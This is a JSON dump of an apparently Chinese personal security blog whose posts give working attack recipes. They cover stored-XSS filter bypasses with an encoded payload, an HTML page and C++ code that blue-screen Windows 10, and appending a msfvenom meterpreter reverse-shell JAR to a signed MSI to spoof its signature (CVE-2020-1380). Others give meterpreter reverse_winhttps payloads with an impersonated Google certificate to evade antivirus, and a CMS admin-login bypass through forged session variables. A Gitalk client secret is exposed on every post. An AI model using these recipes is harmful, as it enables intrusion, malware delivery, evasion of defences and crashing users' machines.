属性存在,等号合规 select += item + " && " else: return False return select.rstrip(' && ') # 去除多余符号def main(): str = "domain=baidu.com" str1 = "ip=61.135.186.217,domain=baidu.com" if getselect(str1) != False: # 进行数据处理,数据合规就进行下一步操作 fofaapi(getselect(str1))if __name__ == '__main__': main() 文件结果如下,可根据需求改动 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"存储xss挖掘经验","slug":"xss","date":"2021-01-30T08:58:23.000Z","updated":"2021-03-07T13:33:01.475Z","comments":true,"path":"2021/01/30/xss/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/xss/","excerpt":"","text":"#存储xss挖掘经验 结合这几天挖掘的src xss稍微总结一下存储xss的挖掘经验 出现位置#一般都是有框就X 例如站内信功能 评论功能等个人喜欢先填写一个<img src=1>看看解析不解析img标签 或者实体编码 进行判断xss的存在,有些厂商一般不会ban img a这种标签,只会ban 
alert,或者onclick,onload,onerror这种事件属性, 有些地方会进行一个前台校验输入是否合法 但是后端没有进行判断,例如下图 我们就可以在前台输入一个正常的数据例如aaa都可以 然后抓包修改 就可以进行绕过 或者还有一些地方有输入长度限制,可以f12修改一下maxlength看看输入payload之后提交后能不能正常的进行保存 如果能进行保存成功的话那就又是前端校验 或者通过事件进行缩短payload #payload的绕过 https://www.cnblogs.com/H4ck3R-XiX/p/12732356.html 我觉得这篇文章是一篇不错的总结 如果输入一个很明显是有害的payload如:<script>alert('xss')</script 之类的可能会将script alert这类危险字符进行一个分割或者加点之类的 这里script被分割 无法触发payload 这里用点进行了分割 这时候我们可以进行一个编码绕过 例如<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;/xss/&#41;>aaaa 至于编码绕过上面这篇文章已经总结的很详细了。 #如何触发payload?耐心很重要,例如上面的一个例子 我将自己的姓名修改为xss payload发现并没有解析 差点让我痛失一个中危- - 后面我发现这个站有评论功能 我奇怪的发现当我随便评论一个东西的时候 他解析了img标签 也就是说评论时是带姓名来评论的 而这里又没有任何的过滤 可以说是形成了一个二次xss吧 接下就只需要将payload替换成弹窗或者引入外部js什么的 就能直接起飞了 因为这个位置没有任何的过滤 还有一种常见的就是厂商在前台进行了校验 而忽略了后台的校验 例如 我一般喜欢用两个账号测试xss 一个账号发布 然后另一个账号测试 在评论处输入payload是没什么反应的 但是当我进入发布者的后台时候发现弹窗了这样一个存储xss也就到手了 总之就是多去测试 尽量寻找可能触发payload的地方 遇到实体编码的地方就可以去寻找其他一些可能触发payload的位置 [转] var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"win10蓝屏bug","slug":"win10蓝屏bug","date":"2021-01-30T08:14:21.000Z","updated":"2021-03-07T13:32:42.879Z","comments":true,"path":"2021/01/30/win10蓝屏bug/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/win10%E8%93%9D%E5%B1%8Fbug/","excerpt":"","text":"#win10蓝屏bug最近win10 的蓝屏bug最近很火,在google浏览器中输入: \\\\.\\globalroot\\device\\condrv\\kernelconnect 就会蓝屏,亲测有效; 看到吾爱中分析解释说是condrv驱动里的派遣函数CdpDispatchCleanup发生了空指针引用,而后触发了蓝屏。 因为谷歌浏览器调用了GetFileAttributesExW函数,然后转入ntdll,接着走进了内核,然后调用了condrv的派遣函数。 12345678<html><head></head><body>><script>document.location = 
'\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect';</script></body></html> 有师傅分享了代码: 12345678910/ BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。//#include <iostream>#include <Windows.h>int main(){ WCHAR fileName[] = L"\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect"; WIN32_FILE_ATTRIBUTE_DATA data; GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);} 直接编译成exe文件: 运行生成的exe文件,成功蓝屏:好像没看到可以利用此漏洞来远程执行代码的,希望win10早点修复这个bug呗。 参考链接:https://www.52pojie.cn/thread-1354077-1-1.html var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2020-1380签名伪造","slug":"CVE-2020-1380签名伪造","date":"2020-11-17T10:17:01.000Z","updated":"2021-03-07T13:32:07.379Z","comments":true,"path":"2020/11/17/CVE-2020-1380签名伪造/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/CVE-2020-1380%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0/","excerpt":"","text":"#CVE-2020-1380签名伪造在之前的文章中,冷逸曾写过一篇《使用CVE-2020-0601进行伪造签名》的文章,里面利用windows其对椭圆曲线的逻辑处理错误,可以为任何程序添加可信的数字签名。而今天介绍的是冷逸另一种更加简单的方法,来添加数字签名,漏洞编号为CVE-2020-1380也称之为GlueBall。利用该漏洞可绕过安全特征,不正确地加载已签名文件。在攻击场景中,攻击者能够绕过旨在阻止加载不正确签名文件的安全特征。我们来看一下这个漏洞,众所周知,在以管理员权限运行时,windows会弹出uac的提示,而拥有数字签名的程序触发uac时,为蓝色. 非数字签名的为黄色 而众所周知比较常用的数字签名伪造工具sigthief是可以进行签名伪造的,该工具伪造的签名在国内的一些在线测试平台上会显示签名正常,而在VT则会显示无效签名,在系统中也会显示签名无效. 而利用该漏洞签名的文件,则会显示正常. 注:VT已针对该漏洞进行更新,VT可成功检测该漏洞攻击,会显示invaild-signature 下面即对该漏洞进行复现,该漏洞的复现过程很简单,准备一个带有数字签名的msi文件,一个恶意的jar文件(可msf生成),然后合成即可,思路如下. 
msfvenom -p java/meterpreter/reverse_https LHOST= LPORT= -f jar -o xxx.jar 然后制作文件 copy /b xxx.msi + xxx.jar xxx.jar 成功获取session。其余java编写文件都可以使用该方法进行制作,注:只能为java文件 导致该漏洞的原因为当 Windows 读取 MSI 文件时,它会从文件开头开始读取,一直到有效的 MSI 签名末尾结束并舍弃其它部分。因此在检测到合法的 MSI 文件结构后,它会忽略被附加的数据,而不管它是什么。而JAR 文件只不过是 ZIP 文件,并且在执行时由 Java 运行时从文件末尾开始读取,直到检测到有效 ZIP 文件结构的开头为止,然后它将丢弃文件的其余部分。这最后将造成indows 开始从开头读取而 JAVA 从末尾读取时,windows认为其是一个签名文件,而java文件也可以正常运行。 现windows已更新了相关补丁,主要为msisip.dll该文件,加入了NeedFileSizeVerification和VerifyFileSize两个逻辑,更新系统即可防止该类攻击。 参考文章:https://blog.csdn.net/smellycat000/article/details/108091187https://www.secrss.com/articles/24763https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/https://www.chainnews.com/zh-hant/articles/041869869233.htmhttps://wwws.nightwatchcybersecurity.com/2019/01/16/thoughts-on-the-msi-jar-authenticode-bypass/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"httpsms","slug":"httpsms","date":"2020-11-17T10:00:38.000Z","updated":"2021-03-07T13:32:33.655Z","comments":true,"path":"2020/11/17/httpsms/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/httpsms/","excerpt":"","text":"#https证书绕过杀软msf生成证书(要能连上google,用俺vps来搞)use auxiliary/gather/impersonate_ssl set RHOST www.google.com run生成msf攻击载荷:msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.226.136 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o pentestlab.py然后msf监听: use exploit/multi/handler set payload windows/meterpreter/reverse_winhttps set LHOST 192.168.226.136 set LPORT 443 set 
HandlerSSLCert /root/www.google.com.pem (设置证书) set StagerVerifySSLCert true exploit -j 然后在win7上运行这个pentestlab.py 360杀毒,安全卫士无反应。 全自动工具:https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL 参考:https://pentestlab.blog/category/defense-evasion/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cms","slug":"cms漏洞","date":"2020-11-17T09:36:28.000Z","updated":"2021-03-07T13:31:53.691Z","comments":true,"path":"2020/11/17/cms漏洞/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/cms%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#cms后台登录绕过@miko 1.随便打开一个index.php,然后发送post请求,创建seions.POST:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999此时就成功地创建了SESION变量.2.创建完成后,登录后台.3.成功! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"about","slug":"about","date":"2020-11-17T09:27:45.000Z","updated":"2021-03-07T13:31:45.419Z","comments":true,"path":"2020/11/17/about/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/about/","excerpt":"","text":"#I’m miko魔域魂窟是我的github博客. 你可以在这里学到东西. 
","categories":[],"tags":[]}],"categories":[],"tags":[]}